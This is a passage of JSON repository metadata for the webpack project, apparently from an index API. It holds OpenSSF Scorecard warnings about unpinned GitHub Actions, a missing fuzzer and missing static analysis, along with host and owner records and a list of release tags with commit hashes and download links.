https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.